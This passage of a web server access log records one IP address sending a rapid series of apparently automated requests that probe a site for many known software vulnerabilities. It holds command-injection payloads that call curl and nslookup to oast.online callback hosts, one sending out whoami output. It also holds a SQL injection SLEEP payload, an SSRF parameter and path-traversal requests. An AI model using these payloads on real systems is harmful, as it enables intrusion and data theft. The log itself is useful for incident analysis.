HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2486.0 Safari/537.36 Edge/13.10586" 154.84.62.234 - - [24/Apr/2025:09:38:54 -0400] "POST 
/dologin.action HTTP/1.1" 200 0 "-" "Mozilla/5.0 (CentOS; Linux i686; rv:122.0) Gecko/20100101 Firefox/122.0" 154.84.62.234 - - [24/Apr/2025:09:38:58 -0400] "GET /welcome.action HTTP/1.1" 200 0 "-" "Mozilla/5.0 (SS; Linux x86_64; rv:125.0) Gecko/20100101 Firefox/125.0" 154.84.62.234 - - [24/Apr/2025:09:39:06 -0400] "POST /api/2.0/mlflow/registered-models/create HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Fedora; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:09:39:12 -0400] "POST /api/2.0/mlflow/model-versions/create HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.124 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:09:39:22 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.34" 154.84.62.234 - - [24/Apr/2025:09:39:22 -0400] "POST /druid/indexer/v1/sampler?for=connect HTTP/1.1" 200 0 "-" "Mozilla/5.0 (ZZ; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:09:39:30 -0400] "POST /api/jmeter/download/files HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:09:39:44 -0400] "GET /geoserver/ows?service=WFS&version=1.0.0&request=GetCapabilities HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0" 154.84.62.234 - - [24/Apr/2025:09:39:52 -0400] "GET /forms/doLogin?login_username=admin&password=password$(curl%20d04qr7ij4pq19d75k49074geyrmwiop8j.oast.online)&x=0&y=0 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 12_1_8; en) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0.4 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:09:40:35 -0400] "GET /index.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_3_1) 
AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.1 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:09:41:25 -0400] "POST /cgi-bin/fax_change_faxtrace_settings HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:09:41:47 -0400] "GET /hax/..CFIDE/adminapi/administrator.cfc?method=getBuildNumber&_cfclient=true HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/118.0" 154.84.62.234 - - [24/Apr/2025:09:42:53 -0400] "GET /session/login HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:09:43:06 -0400] "POST /atutor/login.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.14393" 154.84.62.234 - - [24/Apr/2025:09:43:11 -0400] "POST /inc/jquery/uploadify/uploadify.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:09:43:53 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Knoppix; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:09:44:23 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.9.25" 154.84.62.234 - - [24/Apr/2025:09:45:32 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Knoppix; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:09:45:38 -0400] "GET /wp-json/wp/v2/add-listing?id=1 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Kubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:09:45:46 -0400] "POST 
/cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/iedit.cfc?method=wizardHash&_cfclient=true&returnFormat=wddx&inPassword=foo HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (CentOS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:09:45:46 -0400] "GET /wp-admin/profile.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.0 Mobile/15E148 Safari/604.1" 154.84.62.234 - - [24/Apr/2025:09:45:53 -0400] "POST /CFIDE/wizards/common/utils.cfc?method=wizardHash&inPassword=foo&_cfclient=true&returnFormat=wddx HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:127.0) Gecko/20100101 Firefox/127.0" 154.84.62.234 - - [24/Apr/2025:09:46:01 -0400] "POST /cfusion/..CFIDE/wizards/common/utils.cfc?method=wizardHash&inPassword=foo&_cfclient=true&returnFormat=wddx HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:127.0) Gecko/20100101 Firefox/127.0" 154.84.62.234 - - [24/Apr/2025:09:46:07 -0400] "POST //CFIDE/wizards/common/utils.cfc?method=wizardHash&inPassword=foo&_cfclient=true&returnFormat=wddx HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.8.24" 154.84.62.234 - - [24/Apr/2025:09:46:13 -0400] "GET /spip.php?page=spip_pass HTTP/1.1" 200 0 "-" "Mozilla/5.0 (SS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:09:46:14 -0400] "POST /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/iedit.cfc?method=wizardHash&_cfclient=true&returnFormat=wddx&inPassword=foo HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.6.23" 154.84.62.234 - - [24/Apr/2025:09:46:26 -0400] "GET /api/v1/users HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Fedora; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 
Safari/537.36" 154.84.62.234 - - [24/Apr/2025:09:47:01 -0400] "POST /api/add-article-by-text HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0" 154.84.62.234 - - [24/Apr/2025:09:47:01 -0400] "POST /tshirtecommerce/ajax.php?type=svg HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.1 Safari/605.1.1" 154.84.62.234 - - [24/Apr/2025:09:47:26 -0400] "GET /api/v1/database/7 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Ubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:09:47:26 -0400] "GET /api/v1/database/3 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:09:47:26 -0400] "GET /api/v1/database/5 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.1 Safari/605.9.26" 154.84.62.234 - - [24/Apr/2025:09:47:26 -0400] "GET /api/v1/database/4 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Knoppix; Linux i686; rv:127.0) Gecko/20100101 Firefox/127.0" 154.84.62.234 - - [24/Apr/2025:09:47:26 -0400] "GET /api/v1/database/4 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.7.23" 154.84.62.234 - - [24/Apr/2025:09:47:26 -0400] "GET /api/v1/database/3 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:09:47:26 -0400] "GET /api/v1/database/2 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) LoiLoNote/15.0.0 Version/17.3.1 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:09:47:26 -0400] "GET /api/v1/database/5 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, 
like Gecko) Version/17.5 Safari/605.5.20" 154.84.62.234 - - [24/Apr/2025:09:47:26 -0400] "GET /api/v1/database/6 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux i686; rv:120.0) Gecko/20100101 Firefox/120.0" 154.84.62.234 - - [24/Apr/2025:09:47:26 -0400] "GET /api/v1/database/3 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (CentOS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:09:47:26 -0400] "GET /api/v1/database/6 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:09:47:26 -0400] "GET /api/v1/database/6 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; WOW64; rv:41.0) Gecko/20100101 Firefox/127.0.2 (x64 de)" 154.84.62.234 - - [24/Apr/2025:09:47:26 -0400] "GET /api/v1/database/1 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh, Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:09:47:26 -0400] "GET /api/v1/database/2 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 12) AppleWebKit/618.6 (KHTML, like Gecko) Version/17.2 Safari/618.6" 154.84.62.234 - - [24/Apr/2025:09:47:26 -0400] "GET /api/v1/database/9 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.8.17" 154.84.62.234 - - [24/Apr/2025:09:47:26 -0400] "GET /api/v1/database/4 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:09:47:26 -0400] "GET /api/v1/database/2 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14) AppleWebKit/616.21 (KHTML, like Gecko) Version/17.0 Safari/616.21" 154.84.62.234 - - [24/Apr/2025:09:47:27 -0400] "GET /api/v1/database/7 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Kubuntu; Linux x86_64; rv:122.0) Gecko/20100101 Firefox/122.0" 
154.84.62.234 - - [24/Apr/2025:09:47:27 -0400] "GET /api/v1/database/1 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0" 154.84.62.234 - - [24/Apr/2025:09:47:27 -0400] "GET /api/v1/database/5 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Ubuntu; Linux i686; rv:123.0) Gecko/20100101 Firefox/123.0" 154.84.62.234 - - [24/Apr/2025:09:47:27 -0400] "GET /api/v1/database/7 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:09:47:27 -0400] "GET /api/v1/database/10 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; U; Linux i686; pt-BR; rv:1.9.0.3) Gecko/2008092510 Ubuntu/8.04 (hardy) Firefox/3.0.3" 154.84.62.234 - - [24/Apr/2025:09:47:27 -0400] "GET /api/v1/database/1 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (ZZ; Linux x86_64; rv:124.0) Gecko/20100101 Firefox/124.0" 154.84.62.234 - - [24/Apr/2025:09:47:27 -0400] "GET /api/v1/database/10 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0" 154.84.62.234 - - [24/Apr/2025:09:47:27 -0400] "GET /api/v1/database/9 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:09:47:33 -0400] "GET /api/v1/database/3 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:122.0) Gecko/20100101 Firefox/122.0" 154.84.62.234 - - [24/Apr/2025:09:47:33 -0400] "GET /api/v1/database/10 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0 Safari/605.7.18" 154.84.62.234 - - [24/Apr/2025:09:47:33 -0400] "GET /api/v1/database/9 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.46" 154.84.62.234 - - [24/Apr/2025:09:47:33 -0400] "GET /api/v1/database/4 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; 
Win64; x64; rv:101.0) Gecko/20100101 Firefox/101.0" 154.84.62.234 - - [24/Apr/2025:09:47:33 -0400] "GET /api/v1/database/6 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Gecko/20100101 Firefox/128.0 (x64 de)" 154.84.62.234 - - [24/Apr/2025:09:47:33 -0400] "GET /api/v1/database/7 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (SS; Linux x86_64; rv:126.0) Gecko/20100101 Firefox/126.0" 154.84.62.234 - - [24/Apr/2025:09:47:33 -0400] "GET /api/v1/database/9 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (CentOS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:09:47:33 -0400] "GET /api/v1/database/4 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:09:47:33 -0400] "GET /api/v1/database/2 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (SS; Linux x86_64; rv:124.0) Gecko/20100101 Firefox/124.0" 154.84.62.234 - - [24/Apr/2025:09:47:33 -0400] "GET /api/v1/database/10 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0" 154.84.62.234 - - [24/Apr/2025:09:47:33 -0400] "GET /api/v1/database/2 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0" 154.84.62.234 - - [24/Apr/2025:09:47:33 -0400] "GET /api/v1/database/5 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0" 154.84.62.234 - - [24/Apr/2025:09:47:33 -0400] "GET /api/v1/database/3 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (ZZ; Linux i686; rv:123.0) Gecko/20100101 Firefox/123.0" 154.84.62.234 - - [24/Apr/2025:09:47:33 -0400] "GET /api/v1/database/1 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Fedora; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:09:47:33 -0400] "GET /api/v1/database/1 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like 
Gecko) Chrome/43.0.2357.124 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:09:47:34 -0400] "GET /api/v1/database/7 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (SS; Linux i686; rv:121.0) Gecko/20100101 Firefox/121.0" 154.84.62.234 - - [24/Apr/2025:09:47:34 -0400] "GET /api/v1/database/6 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Kubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:09:47:34 -0400] "GET /api/v1/database/10 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Fedora; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:09:47:34 -0400] "GET /api/v1/database/5 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Knoppix; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:09:47:34 -0400] "GET /api/v1/database/9 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (CentOS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:09:48:29 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.4.22" 154.84.62.234 - - [24/Apr/2025:09:48:29 -0400] "GET /api/hassio/app/.%252e/supervisor/info HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Fedora; Linux x86_64; rv:124.0) Gecko/20100101 Firefox/124.0" 154.84.62.234 - - [24/Apr/2025:09:48:37 -0400] "GET /api/hassio/app/.%09./supervisor/info HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Debian; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:09:48:45 -0400] "GET /api/hassio_ingress/.%09./supervisor/info HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Knoppix; Linux x86_64; rv:120.0) Gecko/20100101 Firefox/120.0" 154.84.62.234 - - [24/Apr/2025:09:50:35 -0400] "POST / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (SS; Linux i686; rv:124.0) Gecko/20100101 Firefox/124.0" 154.84.62.234 - - [24/Apr/2025:09:51:02 -0400] "POST 
/ajax-api/2.0/mlflow/registered-models/create HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:09:51:10 -0400] "POST /ajax-api/2.0/mlflow/model-versions/create HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.2 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:09:51:15 -0400] "POST /index.php/management/set_timezone HTTP/1.1" 200 0 "https://mgrokokbet.id/index.php/management/datetime" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.8.19" 154.84.62.234 - - [24/Apr/2025:09:51:20 -0400] "POST /minio/bootstrap/v1/verify HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:09:51:27 -0400] "GET /wp-content/plugins/gift-voucher/readme.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:09:52:04 -0400] "GET /users/sign_in HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Ubuntu; Linux x86_64; rv:123.0) Gecko/20100101 Firefox/123.0" 154.84.62.234 - - [24/Apr/2025:09:54:44 -0400] "GET /app?service=page/SetupCompleted HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:09:54:52 -0400] "POST /app HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:09:55:01 -0400] "POST /app HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; rv:88.0) Gecko/20100101 Firefox/88.0" 154.84.62.234 - - [24/Apr/2025:09:55:10 -0400] "POST /app HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 
(KHTML, like Gecko) Version/17.3.1 Safari/605.1.1 20.51" 154.84.62.234 - - [24/Apr/2025:09:55:18 -0400] "POST /app HTTP/1.1" 200 0 "-" "Mozilla/5.0 (CentOS; Linux i686; rv:120.0) Gecko/20100101 Firefox/120.0" 154.84.62.234 - - [24/Apr/2025:09:55:27 -0400] "POST /app HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Ubuntu; Linux i686; rv:123.0) Gecko/20100101 Firefox/123.0" 154.84.62.234 - - [24/Apr/2025:09:55:28 -0400] "POST ///CFIDE/adminapi/accessmanager.cfc?method=foo&_cfclient=true HTTP/1.1" 200 0 "-" "Mozilla/5.0 (CentOS; Linux i686; rv:125.0) Gecko/20100101 Firefox/125.0" 154.84.62.234 - - [24/Apr/2025:09:55:35 -0400] "GET /app?service=page/PrinterList HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.14393" 154.84.62.234 - - [24/Apr/2025:09:56:00 -0400] "POST /classes/Login.php?f=login HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Knoppix; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:09:56:58 -0400] "POST / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Knoppix; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:09:57:13 -0400] "GET /_api/web/siteusers HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 154.84.62.234 - - [24/Apr/2025:09:57:20 -0400] "GET /_api/web/siteusers HTTP/1.1" 200 0 "-" "Mozilla/5.0 (CentOS; Linux x86_64; rv:120.0) Gecko/20100101 Firefox/120.0" 154.84.62.234 - - [24/Apr/2025:09:57:23 -0400] "POST /texteditor.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0" 154.84.62.234 - - [24/Apr/2025:09:57:38 -0400] "POST /user/save HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/118.0" 154.84.62.234 - - [24/Apr/2025:09:57:58 -0400] "POST /job/list HTTP/1.1" 200 0 "-" "Mozilla/5.0 
(Fedora; Linux x86_64; rv:127.0) Gecko/20100101 Firefox/127.0" 154.84.62.234 - - [24/Apr/2025:10:00:11 -0400] "POST /cgi-bin/cstecgi.cgi HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.5 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:10:00:18 -0400] "POST /v1/warehouse/pending-events HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0" 154.84.62.234 - - [24/Apr/2025:10:00:19 -0400] "GET /wp-content/plugins/mstore-api/readme.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (SS; Linux x86_64; rv:127.0) Gecko/20100101 Firefox/127.0" 154.84.62.234 - - [24/Apr/2025:10:00:21 -0400] "GET /2w9rfZrrtWUPdRqwHPpqJXmA69W HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:10:01:03 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Safari/605.7.21" 154.84.62.234 - - [24/Apr/2025:10:01:10 -0400] "GET /modules/leocustomajax/leoajax.php?cat_list=(SELECT(0)FROM(SELECT(SLEEP(6)))a) HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:126.0) Gecko/20100101 Firefox/126.0" 154.84.62.234 - - [24/Apr/2025:10:01:20 -0400] "GET /index.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Kubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:10:02:00 -0400] "GET /bypass/config?type=sqs&keyId=test&key=security&queueUrl=http://d04qr7ij4pq19d75k4907azapj8gom3s4.oast.online/ HTTP/1.1" 200 0 "-" "Mozilla/5.0 (CentOS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:10:03:01 -0400] "GET 
/getsamplebacklog?arg1=2d0ows2x9anpzaorxi9h4csmai08jjor&arg2=%7b%22type%22%3a%22client%22%2c%22earliest%22%3a%221676976316.328%7c%7cnslookup%20%24(xxd%20-pu%20%3c%3c%3c%20%24(whoami)).d04qr7ij4pq19d75k490ptjhw6ysg71ob.oast.online%7c%7cx%22%2c%22latest%22%3a1676976916.328%2c%22origins%22%3a%5b%7b%22ip%22%3a%22mgrokokbet.id%22%2c%22source%22%3a0%7d%5d%2c%22seriesID%22%3a3%7d&arg3=undefined&arg4=undefined&arg5=undefined&arg6=undefined&arg7=undefined HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:10:03:37 -0400] "POST /api/router/mesh/status HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063" 154.84.62.234 - - [24/Apr/2025:10:04:12 -0400] "GET 